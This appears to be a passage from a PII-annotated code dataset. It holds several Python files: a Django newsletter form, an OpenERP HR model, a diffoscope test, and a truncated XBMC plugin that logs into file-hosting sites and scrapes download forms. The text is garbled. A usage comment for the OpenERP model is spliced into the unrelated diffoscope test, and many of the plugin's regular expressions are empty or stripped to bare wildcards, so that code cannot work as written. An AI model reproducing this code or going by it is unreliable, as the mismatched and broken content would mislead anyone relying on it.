'Netconf.Agent.Tt'], ['URL', 'self.tty.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.Netconf.Agent.Tty.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'Netconf.Agent.Tty.Se'], ['URL', 'self.sessions.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.Netconf.Agent.Tty.Sessions.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.session.pa'], ['URL', 'self.session.na'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'ydk.models.ci'], ['URL', 'Netconf.Agent.Tty.Sessions.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'Netconf.Agent.Tty.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'Netconf.Agent.Tt'], ['URL', 'self.tt'], ['URL', 'self.tt'], ['URL', 'ydk.models.ci'], ['URL', 'Netconf.Ag'], ['URL', 'self.ag'], ['URL', 'self.ag'], ['URL', 'ydk.models.ci'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Ag'], ['URL', 'self.ag'], ['URL', 'XrXml.Ag'], ['URL', 'self.agent.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.De'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 
'oper.XrXml.Ag'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.Tt'], ['URL', 'self.pa'], ['URL', 'self.de'], ['URL', 'XrXml.Agent.De'], ['URL', 'self.default.pa'], ['URL', 'XrXml.Ag'], ['URL', 'self.ssl.pa'], ['URL', 'self.tt'], ['URL', 'XrXml.Agent.Tt'], ['URL', 'self.tty.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.Tty.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'XrXml.Agent.Tty.Se'], ['URL', 'self.sessions.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.Tty.Sessions.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.session.pa'], ['URL', 'self.session.na'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.Tty.Sessions.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.Tty.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.Tt'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.Default.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'XrXml.Agent.Default.Se'], ['URL', 'self.sessions.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.Default.Sessions.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.session.pa'], ['URL', 'self.session.na'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.Default.Sessions.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.Default.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.De'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.Ssl.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'XrXml.Agent.Ssl.Se'], ['URL', 'self.sessions.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.Ssl.Sessions.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.session.pa'], ['URL', 'self.session.na'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 
'self.st'], ['URL', 'self.us'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.Ssl.Sessions.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.Ssl.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Ag'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.tt'], ['URL', 'self.tt'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Ag'], ['URL', 'self.ag'], ['URL', 'self.ag'], ['URL', 'ydk.models.ci']]" +104,"__author__ = 'Viktor Kerkez dummy@email.com' +__contact__ = dummy@email.com' +__date__ = '20 April 2010' +__copyright__ = 'Copyright (c) 2010 Viktor Kerkez' + +import logging +from django import forms +from django.conf import settings +from google.appengine.api import mail + +# perart imports +from perart import models + +class PerArtForm(forms.ModelForm): + tinymce = True + +class ProgramForm(PerArtForm): + class Meta: + model = models.Program + exclude = ['url'] + + +class ProjectForm(PerArtForm): + class Meta: + model = models.Project + exclude = ['url'] + + +class NewsForm(PerArtForm): + class Meta: + model = models.News + exclude = ['url'] + + +class MenuForm(PerArtForm): + tinymce = False + + class Meta: + model = models.Menu + exclude = ['url'] + + +class GalleryForm(PerArtForm): + class Meta: + model = models.Gallery + exclude = ['url'] + + +class NewsletterForm(forms.Form): + name = forms.CharField(required=True) + email = forms.EmailField(required=True) + + def send_email(self): + try: + mail.send_mail(dummy@email.com', + to=settings.PERART_EMAIL, + subject='""%(name)s"" se prijavio za newsletter' % self.cleaned_data, + body='Ime: %(name)s\nEmail: %(email)s' % self.cleaned_data) + return True + except: + logging.exception('sending message failed') + return False + ",1485,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Viktor Kerkez'], ['DATE_TIME', ""'20 April 2010'""], ['DATE_TIME', '2010'], ['PERSON', 'Viktor Kerkez'], ['URL', 'forms.Fo'], ['PERSON', 'PERART_EMAIL'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'django.co'], ['URL', 'forms.Mo'], ['URL', 'models.Pro'], ['URL', 'models.Pro'], ['URL', 'models.Ne'], ['URL', 'models.Me'], ['URL', 'models.Ga'], ['URL', 'forms.Ch'], ['URL', 'mail.se'], ['URL', 'email.com'], ['URL', 'settings.PE'], ['URL', 'self.cl'], ['URL', 'self.cl']]" +105,"#!/usr/bin/python +# -*- coding: utf-8 -*- +############################################################################## +# +# Pedro Arroyo M dummy@email.com +# Copyright (C) 2015 Mall Connection(). +# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU Affero General Public License as +# published by the Free Software Foundation, either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU Affero General Public License for more details. +# +# You should have received a copy of the GNU Affero General Public License +# along with this program. If not, see . 
+# +############################################################################## + + +from osv import osv +from osv import fields + +class hr_family_responsibilities(osv.osv): + ''' + Open ERP Model + ''' + _name = 'hr.family.responsibilities' + _description = 'openerpmodel' + + _columns = { + 'name':fields.char('Name', size=64, required=True, readonly=False), + 'type':fields.selection([ + ('simple','simple responsibility'), + ('maternal','maternal responsibility'), + ('invalid','invalid responsibility'), + ], 'State', select=True), + 'relationship':fields.selection([ + ('father','father'), + ('son','son / daughter'), + ('spouse','spouse'), + ('Father in law','Father in law / mother in law'), + ('second','second'), + ('Grandfather','Grandfather / Grandmother'), + ('grandchild','grandchild / granddaughter'), + ('sister','sister / brother'), + ('brother in law','brother in law / sister in law'), + ], 'Relationship', select=True, readonly=False), + 'vat': fields.char('TIN', size=32, help=""Tax Identification Number. Check the box if this contact is subjected to taxes. Used by some of the legal statements.""), + 'employee_id': fields.many2one('hr.employee', string='Employee'), + + } +hr_family_responsibilities()",2456,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2015'], ['PERSON', ""law','Father""], ['PERSON', ""Grandfather','Grandfather""], ['URL', 'http://www.mallconnection.org'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'hr.family.re'], ['URL', 'fields.ch'], ['URL', 'fields.se'], ['URL', 'fields.se'], ['URL', 'fields.ch'], ['URL', 'fields.ma']]" +106,"# -*- coding: utf-8 -*- +# +# diffoscope: in-depth comparison of files, archives, and directories +# +# Copyright © 2018 Chris Lamb dummy@email.com +# +# diffoscope is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# diffoscope is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with diffoscope. If not, see .
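+# A minimal usage sketch for the hr.family.responsibilities model defined +# above (old osv API: model methods receive a database cursor and a user +# id; the ids and values below are illustrative assumptions, not part of +# the original module): +# +# resp_obj = self.pool.get('hr.family.responsibilities') +# resp_id = resp_obj.create(cr, uid, { +# 'name': 'Maria', +# 'type': 'simple', # one of: simple / maternal / invalid +# 'relationship': 'son', # a key from the selection list above +# 'employee_id': employee_id, +# })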
+ +import pytest + +from diffoscope.comparators.gnumeric import GnumericFile + +from ..utils.data import load_fixture, get_data +from ..utils.tools import skip_unless_tools_exist +from ..utils.nonexisting import assert_non_existing + +gnumeric1 = load_fixture('test1.gnumeric') +gnumeric2 = load_fixture('test2.gnumeric') + + +def test_identification(gnumeric1): + assert isinstance(gnumeric1, GnumericFile) + + +def test_no_differences(gnumeric1): + difference = gnumeric1.compare(gnumeric1) + assert difference is None + + +@pytest.fixture +def differences(gnumeric1, gnumeric2): + return gnumeric1.compare(gnumeric2).details + + +@skip_unless_tools_exist('ssconvert') +def test_diff(differences): + expected_diff = get_data('gnumeric_expected_diff') + assert differences[0].unified_diff == expected_diff + + +@skip_unless_tools_exist('ssconvert') +def test_compare_non_existing(monkeypatch, gnumeric1): + assert_non_existing(monkeypatch, gnumeric1, has_null_source=False) +",1735,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Chris Lamb'], ['PERSON', ""@skip_unless_tools_exist('ssconvert""], ['PERSON', ""@skip_unless_tools_exist('ssconvert""], ['URL', 'https://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'diffoscope.comparators.gn'], ['URL', '..utils.to'], ['URL', '..utils.no'], ['URL', 'test1.gn'], ['URL', 'test2.gn'], ['URL', 'gnumeric1.com'], ['URL', 'pytest.fi'], ['URL', 'gnumeric1.com']]" +107,"''' + xfilesharing XBMC Plugin + Copyright (C) 2013-2014 ddurdle + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . 
+ + +''' + +import cloudservice +import os +import re +import urllib, urllib2 +import cookielib + + +import xbmc, xbmcaddon, xbmcgui, xbmcplugin + +# global variables +PLUGIN_NAME = 'plugin.video.cloudstream' +PLUGIN_URL = 'plugin://'+PLUGIN_NAME+'/' +ADDON = xbmcaddon.Addon(id=PLUGIN_NAME) + +# helper methods +def log(msg, err=False): + if err: + xbmc.log(ADDON.getAddonInfo('name') + ': ' + msg, xbmc.LOGERROR) + else: + xbmc.log(ADDON.getAddonInfo('name') + ': ' + msg, xbmc.LOGDEBUG) + + +# +# +# +class xfilesharing(cloudservice.cloudservice): + + + # magic numbers + MEDIA_TYPE_VIDEO = 1 + MEDIA_TYPE_FOLDER = 0 + + ## + # initialize (setting 1) username, 2) password, 3) authorization token, 4) user agent string + ## + def __init__(self, name, domain, user, password, auth, user_agent): + return super(xfilesharing,self).__init__(name, domain, user, password, auth, user_agent) + #return cloudservice.__init__(self,domain, user, password, auth, user_agent) + + + + ## + # perform login + ## + def login(self): + + opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar)) + # default User-Agent ('Python-urllib/2.6') will *not* work + opener.addheaders = [('User-Agent', self.user_agent)] + + if self.domain == 'uptostream.com': + self.domain = 'uptobox.com' + + if 'http://' in self.domain: + url = self.domain + else: + url = 'http://' + self.domain + '/' + + + + values = { + 'op' : 'login', + 'login' : self.user, + 'redirect' : url, + 'password' : self.password + } + + + + # try login + try: + response = opener.open(url,urllib.urlencode(values)) + + except urllib2.URLError, e: + if e.code == 403: + #login denied + xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30017)) + log(str(e), True) + return + response_data = response.read() + response.close() + + loginResult = False + #validate successful login + for r in re.finditer('my_account', + response_data, re.DOTALL): + loginResult = True + #validate successful login + for r in re.finditer('logout', + response_data, re.DOTALL): + loginResult = True + + if (loginResult == False): + xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30017)) + log('login failed', True) + return + + for cookie in self.cookiejar: + for r in re.finditer(' ([^\=]+)\=([^\s]+)\s', + str(cookie), re.DOTALL): + cookieType,cookieValue = r.groups() + if cookieType == 'xfss': + self.auth = cookieValue + if cookieType == 'xfsts': + self.auth = cookieValue + + return + + + + ## + # return the appropriate ""headers"" for FireDrive requests that include 1) user agent, 2) authorization cookie + # returns: list containing the header + ## + def getHeadersList(self,referer=''): + if ((self.auth != '' or self.auth != 0) and referer == ''): + return { 'User-Agent' : self.user_agent, 'Cookie' : 'lang=english; login='+self.user+'; xfsts='+self.auth+'; xfss='+self.auth+';' } + elif (self.auth != '' or self.auth != 0): + return { 'User-Agent' : self.user_agent, 'Referer': referer, 'Cookie' : 'lang=english; login='+self.user+'; xfsts='+self.auth+'; xfss='+self.auth+';' } + else: + return { 'User-Agent' : self.user_agent } + + ## + # return the appropriate ""headers"" for FireDrive requests that include 1) user agent, 2) authorization cookie + # returns: URL-encoded header string + ## + def getHeadersEncoded(self, referer=''): + return urllib.urlencode(self.getHeadersList(referer)) + + ## + # retrieve a list of videos, using playback type stream + # parameters: prompt for video quality (optional), cache type (optional) + # 
returns: list of videos + ## + def getVideosList(self, folderID=0, cacheType=0): + + if 'http://' in self.domain: + url = self.domain + else: + url = 'http://' + self.domain + + if 'streamcloud.eu' in self.domain: + + url = url + '/' + + # retrieve all documents + if folderID == 0: + url = url+'?op=my_files' + else: + url = url+'?op=my_files&fld_id='+folderID + + + videos = {} + if True: + req = urllib2.Request(url, None, self.getHeadersList()) + + # if action fails, validate login + try: + response = urllib2.urlopen(req) + except urllib2.URLError, e: + if e.code == 403 or e.code == 401: + self.login() + + req = urllib2.Request(url, None, self.getHeadersList()) + try: + response = urllib2.urlopen(req) + except urllib2.URLError, e: + log(str(e), True) + return + else: + log(str(e), True) + return + + response_data = response.read() + response.close() + + for r in re.finditer('placeholder\=\""(Username)\"" id\=i\""(nputLoginEmail)\"" name\=\""login\""' , + response_data, re.DOTALL): + loginUsername,loginUsernameName = r.groups() + self.login() + + req = urllib2.Request(url, None, self.getHeadersList()) + try: + response = urllib2.urlopen(req) + except urllib2.URLError, e: + log(str(e), True) + return + + response_data = response.read() + response.close() + + + # parsing page for videos + # video-entry + for r in re.finditer('([^\<]+)' , + response_data, re.DOTALL): + fileID,url,fileName = r.groups() + + + # streaming + videos[fileName] = {'url': 'plugin://plugin.video.cloudstream?mode=streamURL&instance='+self.instanceName+'&url=' + url, 'mediaType' : self.MEDIA_TYPE_VIDEO} + + for r in re.finditer('([^\<]+)' , + response_data, re.DOTALL): + url,fileName = r.groups() + + + # streaming + videos[fileName] = {'url': 'plugin://plugin.video.cloudstream?mode=streamURL&instance='+self.instanceName+'&url=' + url, 'mediaType' : self.MEDIA_TYPE_VIDEO} + + # video-entry - bestream + for r in re.finditer('[^\<]+([^\<]+)' , + response_data, re.DOTALL): + url,fileName = r.groups() + + + # streaming + videos[fileName] = {'url': 'plugin://plugin.video.cloudstream?mode=streamURL&instance='+self.instanceName+'&url=' + url, 'mediaType' : self.MEDIA_TYPE_VIDEO} + + # video-entry - uptobox + for r in re.finditer('([^\<]+)' , + response_data, re.DOTALL): + url,fileName = r.groups() + + + # streaming + videos[fileName] = {'url': 'plugin://plugin.video.cloudstream?mode=streamURL&instance='+self.instanceName+'&url=' + url, 'mediaType' : self.MEDIA_TYPE_VIDEO} + + if 'realvid.net' in self.domain: + for r in re.finditer('([^\<]+)\s+' , + response_data, re.DOTALL): + url,fileName = r.groups() + + #flatten folders (no clean way of handling subfolders, so just make the root list all folders & subfolders + #therefore, skip listing folders if we're not in root +# if folderID == 0: + # folder-entry + # for r in re.finditer('([^\<]+)' , +# folderID = 0 +# for r in re.finditer('' , +# response_data, re.DOTALL): +# folderID,folderName = r.groups() + + #remove   from folderName +# folderName = re.sub('\ \;', '', folderName) + + # folder +# if int(folderID) != 0: +# videos[folderName] = {'url': 'plugin://plugin.video.cloudstream?mode=folder&instance='+self.instanceName+'&folderID=' + folderID, 'mediaType' : self.MEDIA_TYPE_FOLDER} +# if folderID == 0: + for r in re.finditer('([^\<]+)' , + response_data, re.DOTALL): + folderID,folderName = r.groups() + + # folder + if int(folderID) != 0 and folderName != ' . . 
': + videos[folderName] = {'url': 'plugin://plugin.video.cloudstream?mode=folder&instance='+self.instanceName+'&folderID=' + folderID, 'mediaType' : self.MEDIA_TYPE_FOLDER} + + return videos + + + ## + # retrieve a video link + # parameters: title of video, whether to prompt for quality/format (optional), cache type (optional) + # returns: list of URLs for the video or single URL of video (if not prompting for quality) + ## + def getPublicLink(self,url,cacheType=0): + + fname = '' + opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar)) + opener.addheaders = [ ('User-Agent' , self.user_agent)] + req = urllib2.Request(url) + try: + response = opener.open(req) + except urllib2.URLError, e: + pass + response.close() + url = response.url + +# opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar), MyHTTPErrorProcessor) + opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar)) + opener.addheaders = [ ('User-Agent' , self.user_agent), ('Referer', url), ('Cookie', 'lang=english; login='+self.user+'; xfsts='+self.auth+'; xfss='+self.auth+';')] + + req = urllib2.Request(url) + + + # if action fails, validate login + try: + response = opener.open(req) + except urllib2.URLError, e: + if e.code == 403 or e.code == 401: + self.login() + + req = urllib2.Request(url, None, self.getHeadersList()) + try: + response = opener.open(req) + except urllib2.URLError, e: + log(str(e), True) + return ('','') + else: + log(str(e), True) + return ('','') + + response_data = response.read() + response.close() + + for r in re.finditer('\([^\<]+)\<', + response_data, re.DOTALL | re.I): + title = r.group(1) + if fname == '': + fname = title + + url = response.url + req = urllib2.Request(url) + + for r in re.finditer('name\=\""(code)\"" class\=\""(captcha_code)' , + response_data, re.DOTALL): + loginUsername,loginUsernameName = r.groups() + self.login() + + req = urllib2.Request(url, None, self.getHeadersList()) + try: + response = urllib2.urlopen(req) + except urllib2.URLError, e: + log(str(e), True) + return ('','') + + response_data = response.read() + response.close() + + + if self.domain == 'vidzi.tv': + for r in re.finditer('(file)\: \""([^\""]+)\.mp4\""' ,response_data, re.DOTALL): + streamType,streamURL = r.groups() + return (streamURL + '.mp4', fname) + + confirmID = 0 + values = {} + # fetch video title, download URL and docid for stream link + for r in re.finditer('.*?.*?.*?.*?' ,response_data, re.DOTALL): + op,usr_login,id,fname,referer = r.groups() + values = { + 'op' : op, + 'usr_login' : usr_login, + 'id' : id, + 'fname' : fname, + 'referer' : referer, + 'method_free' : 'Free Download' + + } + + + for r in re.finditer('.*?.*?.*?.*?.*?.*?' ,response_data, re.DOTALL): + op,usr_login,id,fname,referer,hash,submit = r.groups() + values = { + 'op' : op, + 'usr_login' : usr_login, + 'id' : id, + 'fname' : fname, + 'referer' : referer, + 'hash' : hash, + 'imhuman' : submit + + } + + for r in re.finditer('.*?.*?.*?.*?.*?.*?.*?' ,response_data, re.DOTALL): + op,usr_login,id,fname,referer,hash,inhu,submit = r.groups() + values = { + + '_vhash' : 'i1102394cE', + 'gfk' : 'i22abd2449', + 'op' : op, + 'usr_login' : usr_login, + 'id' : id, + 'fname' : fname, + 'referer' : referer, + 'hash' : hash, + 'inhu' : inhu, + 'imhuman' : submit + + } + + for r in re.finditer('.*?.*?.*?' 
,response_data, re.DOTALL): + op,id,referer,submit = r.groups() + values = { + 'op' : op, + 'id' : id, + 'referer' : referer, + 'method_free' : submit, + 'download_direct' : 1 + + } + + for r in re.finditer('.*?.*?.*?.*?' ,response_data, re.DOTALL): + op,id,rand,referer,submit = r.groups() + values = { + 'op' : op, + 'id' : id, + 'rand' : rand, + 'referer' : referer, + 'method_free' : submit, + 'download_direct' : 1 + + } + for r in re.finditer('.*?.*? .*?.*?.*?' ,response_data, re.DOTALL): + ipcount,op,usr_login,id,fname,referer = r.groups() + values = { + 'ipcount_val' : ipcount, + 'op' : op, + 'usr_login' : usr_login, + 'id' : id, + 'fname' : fname, + 'referer' : referer, + 'method_free' : 'Slow access' + } + + values = {} + variable = 'op' + for r in re.finditer('' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + + variable = 'usr_login' + for r in re.finditer('' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + + variable = 'id' + for r in re.finditer('' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + + variable = 'fname' + for r in re.finditer('' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + + variable = 'referer' + for r in re.finditer('' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + + + variable = 'hash' + for r in re.finditer('' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + + variable = 'inhu' + for r in re.finditer('' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + + variable = 'method_free' + for r in re.finditer('' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + + variable = 'method_premium' + for r in re.finditer('' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + + variable = 'rand' + for r in re.finditer('' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + + variable = 'down_direct' + for r in re.finditer('' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + + variable = 'file_size_real' + for r in re.finditer('' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + + variable = 'imhuman' + for r in re.finditer('' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + + variable = 'gfk' + for r in re.finditer('(name): \''+variable+'\', value: \'([^\']*)\'' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + + variable = '_vhash' + for r in re.finditer('(name): \''+variable+'\', value: \'([^\']*)\'' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + +# values['referer'] = '' + + for r in re.finditer('.*?.*?.*?.*?.*?' 
,response_data, re.DOTALL): + op,id,rand,referer,plugins,submit = r.groups() + + values = { + 'op' : op, + 'id' : id, + 'rand' : rand, + 'referer' : referer, + 'plugins_are_not_allowed' : plugins, + 'method_free' : submit, + 'download_direct' : 1 + + } + + + + +# req = urllib2.Request(url, urllib.urlencode(values), self.getHeadersList(url)) + req = urllib2.Request(url) + + if self.domain == 'thefile.me': + values['method_free'] = 'Free Download' + elif self.domain == 'sharesix.com': + values['method_free'] = 'Free' + + elif 'streamcloud.eu' in self.domain: + xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(10)) + xbmc.sleep((int(10)+1)*1000) + + elif self.domain == 'vidhog.com': + xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(15)) + xbmc.sleep((int(15)+1)*1000) + + elif self.domain == 'vidto.me': + xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(6)) + xbmc.sleep((int(6)+1)*1000) + + elif self.domain == 'vodlocker.com': + xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(3)) + xbmc.sleep((int(3)+1)*1000) + + + + elif self.domain == 'hcbit.com': + + try: +# response = urllib2.urlopen(req) + response = opener.open(req, urllib.urlencode(values)) + + except urllib2.URLError, e: + if e.code == 403 or e.code == 401: + self.login() + + try: + response = opener.open(req, urllib.urlencode(values)) + except urllib2.URLError, e: + log(str(e), True) + return ('', '') + else: + log(str(e), True) + return ('', '') + try: + if response.info().getheader('Location') != '': + return (response.info().getheader('Location') + '|' + self.getHeadersEncoded(url), fname) + except: + for r in re.finditer('\'(file)\'\,\'([^\']+)\'' ,response_data, re.DOTALL): + streamType,streamURL = r.groups() + return (streamURL + '|' + self.getHeadersEncoded(url), fname) + for r in re.finditer('\([^\<]+)\<\/td\>' ,response_data, re.DOTALL): + deliminator,fileName = r.groups() + for r in re.finditer('(\|)([^\|]{42})\|' ,response_data, re.DOTALL): + deliminator,fileID = r.groups() + streamURL = 'http://cloud1.hcbit.com/cgi-bin/dl.cgi/'+fileID+'/'+fileName + return (streamURL + '|' + self.getHeadersEncoded(url), fname) + + if self.domain == 'bestreams.net': + + file_id = '' + aff = '' + variable = 'file_id' + for r in re.finditer('\''+variable+'\', (\')([^\']*)\'' ,response_data, re.DOTALL): + hidden,value = r.groups() + file_id = value + + variable = 'aff' + for r in re.finditer('\''+variable+'\', (\')([^\']*)\'' ,response_data, re.DOTALL): + hidden,value = r.groups() + aff = value + + xbmc.sleep((int(2)+1)*1000) + opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar)) + opener.addheaders = [ ('User-Agent' , self.user_agent), ('Referer', url), ('Cookie', 'lang=1; file_id='+file_id+'; aff='+aff+';')] + + elif self.domain == 'thevideo.me': + + for r in re.finditer('\,\s+\'file\'\s+\:\s+\'([^\']+)\'', + response_data, re.DOTALL): + streamURL = r.group(1) + return (streamURL,fname) + + elif self.domain == 'vidzi.tv': + + for r in re.finditer('\s+file:\s+\""([^\""]+)\""', + response_data, re.DOTALL): + streamURL = r.group(1) + return (streamURL,fname) + + # if action fails, validate login + try: +# response = urllib2.urlopen(req) + response = opener.open(req, urllib.urlencode(values)) + + except urllib2.URLError, e: + if e.code == 403 or e.code == 401: + self.login() + + try: + response = opener.open(req, urllib.urlencode(values)) + except 
